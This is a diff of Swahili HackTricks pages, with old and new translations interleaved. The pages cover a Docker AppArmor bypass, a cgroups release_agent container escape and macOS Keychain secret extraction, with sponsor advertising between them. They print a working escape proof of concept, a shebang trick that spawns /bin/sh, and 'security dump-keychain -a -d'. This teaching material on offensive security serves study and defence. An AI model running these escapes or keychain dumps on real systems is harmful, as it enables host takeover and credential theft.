"apparmor=lowpriv"
```
Kisha, unaweza kukimbia mstari ufuatao ili **kupata maelezo sahihi ya profile inayotumiwa**:
Kisha, unaweza kukimbia mstari ufuatao **kupata wasifu sahihi unao tumika**:
```bash
find /etc/apparmor.d/ -name "*lowpriv*" -maxdepth 1 2>/dev/null
```
Katika kesi ya ajabu unaweza **kubadilisha maelezo ya apparmor ya docker na kuirudisha tena.** Unaweza kuondoa vizuizi na "kuvuka" vizuizi hivyo.
### Kizuizi cha AppArmor Docker Bypass2
### Kuvuka AppArmor ya Docker 2
**AppArmor inategemea njia**, hii inamaanisha kwamba hata kama inaweza **kulinda** faili ndani ya saraka kama **`/proc`** ikiwa unaweza **kuweka jinsi kontena itakavyotekelezwa**, unaweza **kumount** saraka ya proc ya mwenyeji ndani ya **`/host/proc`** na **hakitakuwa chini ya ulinzi wa AppArmor tena**.
**AppArmor inategemea njia**, hii inamaanisha kwamba hata kama inaweza **kulinda** faili ndani ya saraka kama **`/proc`** ikiwa unaweza **kuweka jinsi chombo cha kudhibitiwa kitakavyotekelezwa**, unaweza **kufunga** saraka ya proc ya mwenyeji ndani ya **`/host/proc`** na haitalindwa tena na AppArmor.
### Kizuizi cha Shebang cha AppArmor
### Kuvuka Shebang ya AppArmor
Katika [**mdudu huu**](https://bugs.launchpad.net/apparmor/+bug/1911431) unaweza kuona mfano wa jinsi **hata kama unazuia perl kutumika na rasilimali fulani**, ikiwa tu unatengeneza script ya shell **ukiainisha** kwenye mstari wa kwanza **`#!/usr/bin/perl`** na **kutekeleza faili moja kwa moja**, utaweza kutekeleza chochote unachotaka. Kwa mfano:
Katika [**kosa hili**](https://bugs.launchpad.net/apparmor/+bug/1911431) unaweza kuona mfano wa jinsi **hata kama unazuia perl kutumika na rasilimali fulani**, ikiwa tu unajenga script ya shell **ukiainisha** kwenye mstari wa kwanza **`#!/usr/bin/perl`** na **kutekeleza faili moja kwa moja**, utaweza kutekeleza chochote unachotaka. K.m.:
```perl
echo '#!/usr/bin/perl
use POSIX qw(strftime);
@ -266,16 +278,28 @@ exec "/bin/sh"' > /tmp/test.pl
chmod +x /tmp/test.pl
/tmp/test.pl
```
## WhiteIntel
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
[**WhiteIntel**](https://whiteintel.io) ni injini ya utaftaji inayotumia **dark-web** ambayo inatoa huduma za **bure** za kuangalia ikiwa kampuni au wateja wake wameathiriwa na **malware za kuiba**.
Lengo kuu la WhiteIntel ni kupambana na utekaji wa akaunti na mashambulio ya ransomware yanayotokana na malware za kuiba taarifa.
Unaweza kutembelea tovuti yao na kujaribu injini yao kwa **bure** kwa:
{% embed url="https://whiteintel.io" %}
<details>
<summary><strong>Jifunze kuhusu kudukua AWS kutoka sifuri hadi shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (Mtaalam wa Timu Nyekundu ya AWS ya HackTricks)</strong></a><strong>!</strong></summary>
<summary><strong>Jifunze AWS hacking kutoka sifuri hadi shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
Njia nyingine za kusaidia HackTricks:
* Ikiwa unataka kuona **kampuni yako ikionekana kwenye HackTricks** au **kupakua HackTricks kwa muundo wa PDF** Angalia [**MPANGO WA KUJIUNGA**](https://github.com/sponsors/carlospolop)!
* Ikiwa unataka kuona **kampuni yako ikitangazwa kwenye HackTricks** au **kupakua HackTricks kwa PDF** Angalia [**MIPANGO YA KUJIUNGA**](https://github.com/sponsors/carlospolop)!
* Pata [**swag rasmi ya PEASS & HackTricks**](https://peass.creator-spring.com)
* Gundua [**The PEASS Family**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa [**NFTs**](https://opensea.io/collection/the-peass-family) ya kipekee
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au [**kikundi cha telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Shiriki mbinu zako za kudukua kwa kuwasilisha PRs kwenye** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.
* Gundua [**Familia ya PEASS**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa [**NFTs**](https://opensea.io/collection/the-peass-family) ya kipekee
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au kikundi cha [**telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Shiriki mbinu zako za kuhack kwa kuwasilisha PRs kwenye** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
</details>

View file

@ -1,23 +1,36 @@
# Kutoroka kwa Docker release_agent cgroups
# Kutoroka kwa cgroups ya Docker kupitia release\_agent
<details>
<summary><strong>Jifunze kuhusu kudukua AWS kutoka mwanzo hadi kuwa bingwa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
<summary><strong>Jifunze kuhusu kuhack AWS kutoka mwanzo hadi mtaalamu na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (Mtaalamu wa Timu Nyekundu ya AWS ya HackTricks)</strong></a><strong>!</strong></summary>
Njia nyingine za kusaidia HackTricks:
* Ikiwa unataka kuona **kampuni yako ikionekana kwenye HackTricks** au **kupakua HackTricks kwa muundo wa PDF** Angalia [**MPANGO WA KUJIUNGA**](https://github.com/sponsors/carlospolop)!
* Pata [**swag rasmi wa PEASS & HackTricks**](https://peass.creator-spring.com)
* Gundua [**The PEASS Family**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa [**NFTs**](https://opensea.io/collection/the-peass-family) za kipekee
* Ikiwa unataka kuona **kampuni yako ikitangazwa kwenye HackTricks** au **kupakua HackTricks kwa PDF** Angalia [**MIPANGO YA KUJIUNGA**](https://github.com/sponsors/carlospolop)!
* Pata [**bidhaa rasmi za PEASS & HackTricks**](https://peass.creator-spring.com)
* Gundua [**Familia ya PEASS**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa [**NFTs**](https://opensea.io/collection/the-peass-family) za kipekee
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au [**kikundi cha telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Shiriki mbinu zako za kudukua kwa kuwasilisha PRs kwenye** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.
* **Shiriki mbinu zako za kuhack kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.
</details>
## WhiteIntel
**Kwa maelezo zaidi, tazama [chapisho la blogi asili](https://blog.trailofbits.com/2019/07/19/understanding-docker-container-escapes/).** Hii ni muhtasari tu:
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
PoC Asili:
[**WhiteIntel**](https://whiteintel.io) ni injini ya utaftaji inayotumia **dark-web** ambayo inatoa huduma za **bure** za kuangalia ikiwa kampuni au wateja wake wame **vamiwa** na **malware za wizi**.
Lengo kuu la WhiteIntel ni kupambana na utekaji wa akaunti na mashambulio ya ransomware yanayotokana na malware za kuiba taarifa.
Unaweza kutembelea tovuti yao na kujaribu injini yao **bure** kwa:
{% embed url="https://whiteintel.io" %}
---
**Kwa maelezo zaidi, tazama [chapisho la blogi la asili](https://blog.trailofbits.com/2019/07/19/understanding-docker-container-escapes/).** Hii ni muhtasari tu:
Poc ya Asili:
```shell
d=`dirname $(ls -x /s*/fs/c*/*/r* |head -n1)`
mkdir -p $d/w;echo 1 >$d/w/notify_on_release
@ -25,50 +38,62 @@ t=`sed -n 's/.*\perdir=\([^,]*\).*/\1/p' /etc/mtab`
touch /o; echo $t/c >$d/release_agent;echo "#!/bin/sh
$1 >$t/o" >/c;chmod +x /c;sh -c "echo 0 >$d/w/cgroup.procs";sleep 1;cat /o
```
Uthibitisho wa dhana (PoC) unaonyesha njia ya kutumia cgroups kwa kujenga faili ya `release_agent` na kusababisha wito wake kutekeleza amri za aina yoyote kwenye mwenyeji wa kontena. Hapa kuna maelezo ya hatua zinazohusika:
Uthibitisho wa dhana (PoC) unaonyesha njia ya kutumia cgroups kwa kuunda faili ya `release_agent` na kuzindua wito wake kutekeleza amri za aina yoyote kwenye mwenyeji wa kontena. Hapa kuna maelezo ya hatua zinazohusika:
1. **Andaa Mazingira:**
- Inajengwa saraka `/tmp/cgrp` kama sehemu ya kufunga cgroup.
- Kudhibitiwa kwa cgroup ya RDMA kwenye saraka hii. Ikiwa kudhibitiwa kwa RDMA hakupo, inashauriwa kutumia kudhibitiwa kwa cgroup ya `memory` kama mbadala.
- Dhibiti `/tmp/cgrp` inaundwa kutumika kama kituo cha mlima kwa cgroup.
- Msimamizi wa cgroup wa RDMA unamiminiwa kwenye saraka hii. Kwa kutokuwepo kwa msimamizi wa RDMA, inapendekezwa kutumia msimamizi wa cgroup wa `memory` kama mbadala.
```shell
mkdir /tmp/cgrp && mount -t cgroup -o rdma cgroup /tmp/cgrp && mkdir /tmp/cgrp/x
```
2. **Sanidi Kikundi cha Mtoto:**
- Kikundi cha mtoto kinachoitwa "x" kinatengenezwa ndani ya saraka iliyosanidiwa ya kikundi.
- Arifa zinaidhinishwa kwa kikundi cha "x" kwa kuandika 1 kwenye faili yake ya notify_on_release.
2. **Wekeza Kikundi cha Mtoto (Child Cgroup):**
- Kikundi cha mtoto kinachoitwa "x" kinaundwa ndani ya saraka iliyomountiwa ya cgroup.
- Taarifa zinaanzishwa kwa kikundi cha "x" kwa kuandika 1 kwenye faili yake ya notify_on_release.
```shell
echo 1 > /tmp/cgrp/x/notify_on_release
```
3. **Sanidi Wakala wa Kutolewa:**
3. **Sanidi Msimamizi wa Kutolewa:**
- Njia ya chombo kwenye mwenyeji inapatikana kutoka faili ya /etc/mtab.
- Faili ya release_agent ya cgroup inasanidiwa kutekeleza hati iliyoitwa /cmd iliyoko kwenye njia ya mwenyeji iliyopatikana.
- Faili ya release_agent ya cgroup kisha inasanidiwa kutekeleza script iliyoitwa /cmd iliyoko kwenye njia ya mwenyeji iliyopatikana.
```shell
host_path=`sed -n 's/.*\perdir=\([^,]*\).*/\1/p' /etc/mtab`
echo "$host_path/cmd" > /tmp/cgrp/release_agent
```
4. **Unda na Sanidi Skripti ya /cmd:**
- Skripti ya /cmd inaundwa ndani ya kontena na inasanidiwa kutekeleza ps aux, ikielekeza matokeo kwenye faili iliyoitwa /output ndani ya kontena. Njia kamili ya /output kwenye mwenyeji inatajwa.
- Skripti ya /cmd inaundwa ndani ya chombo na kusanidiwa kutekeleza ps aux, ikielekeza matokeo kwenye faili iliyoitwa /output kwenye chombo. Njia kamili ya /output kwenye mwenyeji inatajwa.
```shell
echo '#!/bin/sh' > /cmd
echo "ps aux > $host_path/output" >> /cmd
chmod a+x /cmd
```
5. **Kuzindua Shambulio:**
- Mchakato unaanzishwa ndani ya kikundi cha watoto "x" na mara moja unakomeshwa.
- Hii inazindua `release_agent` (script ya /cmd), ambayo inatekeleza ps aux kwenye mwenyeji na kuandika matokeo kwenye /output ndani ya kontena.
5. **Kuzindua Shambulizi:**
- Mchakato unaanzishwa ndani ya cgroup ya mtoto "x" na mara moja unakomeshwa.
- Hii inazindua `release_agent` (skripti ya /cmd), ambayo inatekeleza ps aux kwenye mwenyeji na kuandika matokeo kwa /output ndani ya kontena.
```shell
sh -c "echo \$\$ > /tmp/cgrp/x/cgroup.procs"
```
## WhiteIntel
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
[**WhiteIntel**](https://whiteintel.io) ni injini ya utaftaji inayotumia **dark-web** ambayo inatoa huduma za **bure** za kuangalia ikiwa kampuni au wateja wake wameathiriwa na **malware za wizi**.
Lengo kuu la WhiteIntel ni kupambana na utekaji wa akaunti na mashambulio ya ransomware yanayotokana na malware za wizi wa habari.
Unaweza kutembelea tovuti yao na kujaribu injini yao kwa **bure** kwa:
{% embed url="https://whiteintel.io" %}
<details>
<summary><strong>Jifunze kuhusu kudukua AWS kutoka mwanzo hadi kuwa bingwa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (Mtaalam wa Timu Nyekundu ya AWS ya HackTricks)</strong></a><strong>!</strong></summary>
<summary><strong>Jifunze AWS hacking kutoka sifuri hadi shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
Njia nyingine za kusaidia HackTricks:
* Ikiwa unataka kuona **kampuni yako ikionekana kwenye HackTricks** au **kupakua HackTricks kwa muundo wa PDF** Angalia [**MPANGO WA KUJIUNGA**](https://github.com/sponsors/carlospolop)!
* Pata [**swag rasmi ya PEASS & HackTricks**](https://peass.creator-spring.com)
* Gundua [**The PEASS Family**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa [**NFTs**](https://opensea.io/collection/the-peass-family) ya kipekee
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au [**kikundi cha telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Shiriki mbinu zako za kudukua kwa kuwasilisha PRs kwenye** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.
* Ikiwa unataka kuona **kampuni yako ikitangazwa kwenye HackTricks** au **kupakua HackTricks kwa PDF** Angalia [**MIPANGO YA KUJIUNGA**](https://github.com/sponsors/carlospolop)!
* Pata [**bidhaa rasmi za PEASS & HackTricks**](https://peass.creator-spring.com)
* Gundua [**Familia ya PEASS**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa [**NFTs**](https://opensea.io/collection/the-peass-family) za kipekee
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au kikundi cha [**telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Shiriki mbinu zako za udukuzi kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
</details>

View file

@ -1,71 +1,85 @@
# macOS Keychain
# Keychain ya macOS
<details>
<summary><strong>Jifunze kuhusu kudukua AWS kutoka sifuri hadi shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
<summary><strong>Jifunze AWS hacking kutoka sifuri hadi shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (Mtaalam wa Timu Nyekundu ya AWS ya HackTricks)</strong></a><strong>!</strong></summary>
Njia nyingine za kusaidia HackTricks:
* Ikiwa unataka kuona **kampuni yako ikionekana kwenye HackTricks** au **kupakua HackTricks kwa PDF** Angalia [**MPANGO WA KUJIUNGA**](https://github.com/sponsors/carlospolop)!
* Pata [**swag rasmi ya PEASS & HackTricks**](https://peass.creator-spring.com)
* Gundua [**The PEASS Family**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa kipekee wa [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au [**kikundi cha telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Shiriki mbinu zako za kudukua kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.
* Ikiwa unataka kuona **kampuni yako ikitangazwa kwenye HackTricks** au **kupakua HackTricks kwa PDF** Angalia [**MIPANGO YA USAJILI**](https://github.com/sponsors/carlospolop)!
* Pata [**bidhaa rasmi za PEASS & HackTricks**](https://peass.creator-spring.com)
* Gundua [**Familia ya PEASS**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa [**NFTs**](https://opensea.io/collection/the-peass-family) ya kipekee
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au kikundi cha [**telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Shiriki mbinu zako za udukuzi kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
</details>
## Keychain Kuu
## WhiteIntel
* **Keychain ya Mtumiaji** (`~/Library/Keychains/login.keycahin-db`), ambayo hutumika kuhifadhi **vitambulisho maalum vya mtumiaji** kama nywila za programu, nywila za mtandao, vyeti vilivyotengenezwa na mtumiaji, nywila za mtandao, na funguo za umma / binafsi zilizotengenezwa na mtumiaji.
* **Keychain ya Mfumo** (`/Library/Keychains/System.keychain`), ambayo inahifadhi **vitambulisho vya mfumo kwa kiwango cha mfumo** kama vile nywila za WiFi, vyeti vya mfumo, funguo binafsi za mfumo, na nywila za programu za mfumo.
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
[**WhiteIntel**](https://whiteintel.io) ni injini ya utaftaji iliyochomwa na **dark-web** inayotoa **huduma za bure** za kuangalia ikiwa kampuni au wateja wake wameathiriwa na **malware za kuiba**.
Lengo kuu la WhiteIntel ni kupambana na utekaji wa akaunti na mashambulio ya ransomware yanayotokana na malware za kuiba taarifa.
Unaweza kutembelea tovuti yao na kujaribu injini yao **bure** kwa:
{% embed url="https://whiteintel.io" %}
---
## Keychains Kuu
* **Keychain ya Mtumiaji** (`~/Library/Keychains/login.keycahin-db`), ambayo hutumika kuhifadhi **siri maalum za mtumiaji** kama nywila za programu, nywila za mtandao, vyeti vilivyoundwa na mtumiaji, nywila za mtandao, na funguo za umma/binafsi zilizoundwa na mtumiaji.
* **Keychain ya Mfumo** (`/Library/Keychains/System.keychain`), ambayo hifadhi **siri za mfumo nzima** kama nywila za WiFi, vyeti vya mizizi ya mfumo, funguo binafsi za mfumo, na nywila za programu za mfumo.
### Upatikanaji wa Nywila za Keychain
Faili hizi, ingawa hazina ulinzi wa asili na zinaweza **kupakuliwa**, zimefichwa na zinahitaji **nywila halisi ya mtumiaji ili kufichuliwa**. Zana kama [**Chainbreaker**](https://github.com/n0fate/chainbreaker) inaweza kutumika kwa kufichua.
Faili hizi, ingawa hazina ulinzi wa asili na zinaweza **kupakuliwa**, zimefichwa na zinahitaji **nywila ya wazi ya mtumiaji ili kufichuliwa**. Zana kama [**Chainbreaker**](https://github.com/n0fate/chainbreaker) inaweza kutumika kwa kufichua.
## Ulinzi wa Vitambulisho vya Keychain
## Kinga ya Kuingia kwa Keychain
### ACLs
Kila kuingia kwenye keychain linatawaliwa na **Majedwali ya Kudhibiti Upatikanaji (ACLs)** ambayo yanadhibiti ni nani anaweza kufanya vitendo mbalimbali kwenye kuingia kwenye keychain, ikiwa ni pamoja na:
Kila kuingia kwenye keychain inatawaliwa na **Orodha za Kudhibiti Upatikanaji (ACLs)** ambazo zinaamua ni nani anaweza kutekeleza vitendo mbalimbali kwenye kuingia kwenye keychain, ikiwa ni pamoja na:
* **ACLAuhtorizationExportClear**: Inaruhusu mmiliki kupata maandishi wazi ya siri.
* **ACLAuhtorizationExportWrapped**: Inaruhusu mmiliki kupata maandishi wazi yaliyofichwa na nywila nyingine iliyotolewa.
* **ACLAuhtorizationAny**: Inaruhusu mmiliki kufanya kitendo chochote.
* **ACLAuhtorizationAny**: Inaruhusu mmiliki kutekeleza kitendo chochote.
ACLs hizo zinaambatana na **orodha ya programu za kuaminika** ambazo zinaweza kufanya vitendo hivi bila kuuliza. Hii inaweza kuwa:
ACLs hizo zinaambatana na **orodha ya programu za kuaminika** ambazo zinaweza kutekeleza vitendo hivi bila kuulizwa. Hii inaweza kuwa:
* &#x20;**N`il`** (hakuna idhini inayohitajika, **kila mtu anaaminika**)
* &#x20;**Hakuna** (hakuna idhini inayohitajika, **kila mtu anaaminika**)
* Orodha **tupu** (**hakuna mtu** anaaminika)
* **Orodha** ya **programu maalum**.
Pia kuingia kunaweza kuwa na ufunguo **`ACLAuthorizationPartitionID`,** ambao hutumiwa kutambua **teamid, apple,** na **cdhash.**
Pia kuingia inaweza kuwa na ufunguo **`ACLAuthorizationPartitionID`,** ambao hutumiwa kutambua **teamid, apple,** na **cdhash.**
* Ikiwa **teamid** imeelekezwa, basi ili **kupata thamani ya kuingia** bila **kuuliza**, programu iliyotumika lazima iwe na **teamid sawa**.
* Ikiwa **apple** imeelekezwa, basi programu inahitaji kuwa **imesainiwa** na **Apple**.
* Ikiwa **cdhash** inaonyeshwa, basi programu lazima iwe na **cdhash** maalum.
* Ikiwa **teamid** imetajwa, basi ili **kupata thamani ya kuingia bila** **kuuliza**, programu iliyotumiwa lazima iwe na **teamid sawa**.
* Ikiwa **apple** imetajwa, basi programu inahitaji kuwa **imesainiwa** na **Apple**.
* Ikiwa **cdhash** imetajwa, basi programu lazima iwe na **cdhash** maalum.
### Kuunda Kuingia kwenye Keychain
### Kuunda Kuingia kwa Keychain
Wakati kuingia kwenye keychain mpya inaundwa kwa kutumia **`Keychain Access.app`**, sheria zifuatazo zinatumika:
Wakati kuingia **mgeni** **mgeni** anatumia **`Keychain Access.app`**, sheria zifuatazo zinatumika:
* Programu zote zinaweza kusimbua.
* **Hakuna programu** inaweza kusafirisha/kusimbua (bila kuuliza mtumiaji).
* Programu zote zinaweza kufanya usimbaji.
* **Hakuna programu** inaweza kuuza/kufuli (bila kuuliza mtumiaji).
* Programu zote zinaweza kuona ukaguzi wa uadilifu.
* Hakuna programu inaweza kubadilisha ACLs.
* **partitionID** imewekwa kuwa **`apple`**.
* **PartitionID** imewekwa kama **`apple`**.
Wakati programu inaunda kuingia kwenye keychain, sheria ni kidogo tofauti:
Wakati **programu inaunda kuingia kwenye keychain**, sheria ni tofauti kidogo:
* Programu zote zinaweza kusimbua.
* Ni programu ya **kuunda kuingia** (au programu nyingine yoyote iliyowekwa wazi) tu inaweza kusafirisha/kusimbua (bila kuuliza mtumiaji).
* Programu zote zinaweza kufanya usimbaji.
* Ni **programu inayounda** (au programu nyingine yoyote iliyowekwa wazi) inaweza kuuza/kufuli (bila kuuliza mtumiaji).
* Programu zote zinaweza kuona ukaguzi wa uadilifu.
* Hakuna programu inaweza kubadilisha ACLs.
* **partitionID** imewekwa kuwa **`teamid:[teamID hapa]`**.
* **PartitionID** imewekwa kama **`teamid:[teamID hapa]`**.
## Kupata Keychain
### `security`
### `usalama`
```bash
# Dump all metadata and decrypted secrets (a lot of pop-ups)
security dump-keychain -a -d
@ -79,69 +93,81 @@ security set-generic-password-parition-list -s "test service" -a "test acount" -
### APIs
{% hint style="success" %}
**Uchunguzi na kudondosha** kwa siri za **keychain** ambazo **hazitazalisha ombi** inaweza kufanywa kwa kutumia zana [**LockSmith**](https://github.com/its-a-feature/LockSmith)
**Uchambuzi na kudumpisha** kwa siri ambazo **hazitatoa ujumbe** unaweza kufanywa kwa kutumia chombo [**LockSmith**](https://github.com/its-a-feature/LockSmith)
{% endhint %}
Pata orodha na **habari** kuhusu kila kuingia kwenye keychain:
Pata na **taarifa** kuhusu kila kuingia kwenye keychain:
* API ya **`SecItemCopyMatching`** inatoa habari kuhusu kila kuingia na kuna sifa kadhaa unazoweza kuweka unapotumia:
* **`kSecReturnData`**: Ikiwa ni kweli, itajaribu kufichua data (weka kuwa sahihi ili kuepuka pop-ups)
* **`kSecReturnRef`**: Pata pia kumbukumbu ya kipengee cha keychain (weka kuwa kweli ikiwa baadaye unaona unaweza kufichua bila pop-up)
* **`kSecReturnAttributes`**: Pata metadata kuhusu kuingia
* API ya **`SecItemCopyMatching`** hutoa taarifa kuhusu kila kuingia na kuna sifa unazoweza kuweka unapotumia:
* **`kSecReturnData`**: Ikiwa ni kweli, itajaribu kufichua data (weka kama uwongo kuepuka pop-ups)
* **`kSecReturnRef`**: Pata pia kumbukumbu ya kuingia kwenye keychain (weka kama kweli kwa kesi utaona unaweza kufichua bila pop-up)
* **`kSecReturnAttributes`**: Pata maelezo kuhusu kuingia
* **`kSecMatchLimit`**: Ni matokeo mangapi ya kurudi
* **`kSecClass`**: Aina gani ya kuingia kwenye keychain
Pata **ACLs** ya kila kuingia:
* Kwa kutumia API ya **`SecAccessCopyACLList`** unaweza kupata **ACL kwa kuingia kwenye keychain**, na itarudi orodha ya ACLs (kama `ACLAuhtorizationExportClear` na zingine zilizotajwa hapo awali) ambapo kila orodha ina:
* Kwa API ya **`SecAccessCopyACLList`** unaweza kupata **ACL kwa kuingia kwenye keychain**, na itarudisha orodha ya ACLs (kama `ACLAuhtorizationExportClear` na zingine zilizotajwa awali) ambapo kila orodha ina:
* Maelezo
* **Orodha ya Maombi Yaliyoidhinishwa**. Hii inaweza kuwa:
* **Orodha ya Maombi Yaliyoaminika**. Hii inaweza kuwa:
* Programu: /Applications/Slack.app
* Binary: /usr/libexec/airportd
* Kikundi: group://AirPort
Changanua data:
Ficha data:
* API ya **`SecKeychainItemCopyContent`** inapata maandishi wazi
* API ya **`SecItemExport`** inachanganua funguo na vyeti lakini inaweza kuwa inahitaji kuweka nywila ili kuchanganua yaliyomo yaliyofichwa
* API ya **`SecItemExport`** inaexport funguo na vyeti lakini inaweza kuhitaji kuweka nywila kuuza yaliyomo yaliyofichwa
Na hizi ndizo **mahitaji** ya kuweza **kuchanganua siri bila ombi**:
Na hizi ni **mahitaji** ya kuweza **kuexport siri bila ujumbe**:
* Ikiwa kuna **programu 1 au zaidi zilizoidhinishwa**:
* Inahitaji **idhini sahihi** (**`Nil`**, au kuwa sehemu ya orodha iliyoruhusiwa ya programu katika idhini ya kufikia habari za siri)
* Inahitaji saini ya nambari kufanana na **PartitionID**
* Inahitaji saini ya nambari kufanana na ile ya **programu iliyoidhinishwa** (au kuwa mwanachama wa Kikundi sahihi cha KeychainAccessGroup)
* Ikiwa **programu zote zinatambuliwa**:
* Inahitaji **idhini sahihi**
* Inahitaji saini ya nambari kufanana na **PartitionID**
* Ikiwa hakuna **PartitionID**, basi hii haihitajiki
* Ikiwa kuna **programu 1 au zaidi** zilizoorodheshwa:
* Unahitaji **idhini sahihi** (**`Nil`**, au kuwa **sehemu** ya orodha iliyoruhusiwa ya programu katika idhini ya kupata taarifa za siri)
* Unahitaji sahihi ya msimbo kulingana na **PartitionID**
* Unahitaji sahihi ya msimbo kulingana na ile ya programu moja **iliyoaminika** (au kuwa mwanachama wa KeychainAccessGroup sahihi)
* Ikiwa **programu zote zinaaminika**:
* Unahitaji **idhini sahihi**
* Unahitaji sahihi ya msimbo kulingana na **PartitionID**
* Ikiwa **hakuna PartitionID**, basi hii haifai
{% hint style="danger" %}
Kwa hivyo, ikiwa kuna **programu 1 iliyoorodheshwa**, unahitaji **kuingiza nambari kwenye programu hiyo**.
Hivyo, ikiwa kuna **programu 1 iliyoorodheshwa**, unahitaji **kuingiza msimbo kwenye programu hiyo**.
Ikiwa **apple** imeonyeshwa katika **PartitionID**, unaweza kufikia hiyo na **`osascript`** kwa hivyo chochote kinachotumaini programu zote na apple katika PartitionID. **`Python`** pia inaweza kutumika kwa hili.
Ikiwa **apple** imeonyeshwa katika **partitionID**, unaweza kupata kwa kutumia **`osascript`** kwa hivyo chochote kinachotumaini programu zote na apple katika partitionID. **`Python`** pia inaweza kutumika kwa hili.
{% endhint %}
### Atributi mbili zaidi
### Sifa mbili za ziada
* **Invisible**: Ni bendera ya boolean ya **kuficha** kuingia kutoka kwenye programu ya **UI** ya Keychain
* **General**: Ni kuhifadhi **metadata** (kwa hivyo HAIJAFICHWA)
* Microsoft ilikuwa inahifadhi kwa maandishi wazi vivuli vyote vya kuboresha kufikia mwisho nyeti.
* **Isiyoweza kuonekana**: Ni bendera ya boolean ya **kuficha** kuingia kutoka kwa programu ya **UI** ya Keychain
* **Jumla**: Ni kuhifadhi **metadata** (kwa hivyo SIYOFICHWA)
* Microsoft ilikuwa inahifadhi katika maandishi wazi vitambulisho vyote vya upya kufikia mwisho wa nyeti.
## Marejeo
* [**#OBTS v5.0: "Lock Picking the macOS Keychain" - Cody Thomas**](https://www.youtube.com/watch?v=jKE1ZW33JpY)
## WhiteIntel
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
[**WhiteIntel**](https://whiteintel.io) ni injini ya utaftaji inayotumiwa na **dark-web** inayotoa huduma za **bure** kuchunguza ikiwa kampuni au wateja wake wameathiriwa na **malware za wizi**.
Lengo kuu la WhiteIntel ni kupambana na utekaji wa akaunti na mashambulio ya ransomware yanayotokana na malware za kuiba taarifa.
Unaweza kutembelea tovuti yao na kujaribu injini yao kwa **bure** kwa:
{% embed url="https://whiteintel.io" %}
<details>
<summary><strong>Jifunze kuhusu udukuzi wa AWS kutoka sifuri hadi shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
